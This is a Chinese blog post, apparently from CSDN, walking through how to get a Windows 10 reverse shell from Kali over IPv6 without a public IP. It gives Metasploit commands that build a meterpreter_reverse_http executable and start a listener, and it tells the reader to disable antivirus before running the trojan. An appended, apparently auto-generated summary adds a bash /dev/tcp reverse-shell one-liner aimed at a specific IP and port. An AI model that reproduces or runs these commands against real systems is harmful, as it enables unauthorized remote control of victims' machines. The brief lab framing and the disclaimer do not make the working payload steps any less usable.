无需公网IP反弹shell

一、准备条件

kali机(网络畅通,具有ipv6地址)

Windows10(关掉病毒实时查杀,尽量别开防火墙)

二、生成木门拿到shell

1.启动kali提权

 2.查看自己的ipv6地址

3.设置msfconsole,生成木马

msfconsole
use payload/windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
# 生成shell
generate -f exe -o shell.exe

4.进行监听

use exploits/multi/handler
set payload windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
exploit

 

5.上传木门到Windows10并运行拿到shell

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
公网实现反弹shell的方法有多种。具体要选择哪种方法取决于目标主机的环境和可用工具。如果目标主机上安装有netcat,可以利用netcat反弹shell。如果具有python环境,可以利用python反弹shell。如果具有php环境,可以利用php反弹shell。另外,还可以使用其他工具和技术来实现反弹shell。 举个例子,如果你想在受害机CentOS 7上生成一个反弹shell,连接到宿主机的公网IP地址为10.8.163.224,端口为6666,可以使用以下命令实现端口转发,从而连接到Kali虚拟机上: bash -i >& /dev/tcp/10.8.163.224/6666 0>&1 \[2\] 另外,如果你想利用netcat来实现反弹shell,可以使用Netcat工具。Netcat是一款简单的Unix工具,使用UDP和TCP协议。它可以作为后台操作工具,也可以用作络测试工具或黑客工具。通过使用Netcat,你可以轻松地建立任何连接。\[3\] 需要注意的是,反弹shell是一种潜在的安全风险,应该谨慎使用,并且仅在合法和授权的情况下使用。 #### 引用[.reference_title] - *1* *3* [反弹shell总结](https://blog.csdn.net/weixin_51692662/article/details/127795576)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [如何用内虚拟机kali实现反弹shell](https://blog.csdn.net/qq_44657899/article/details/106307545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值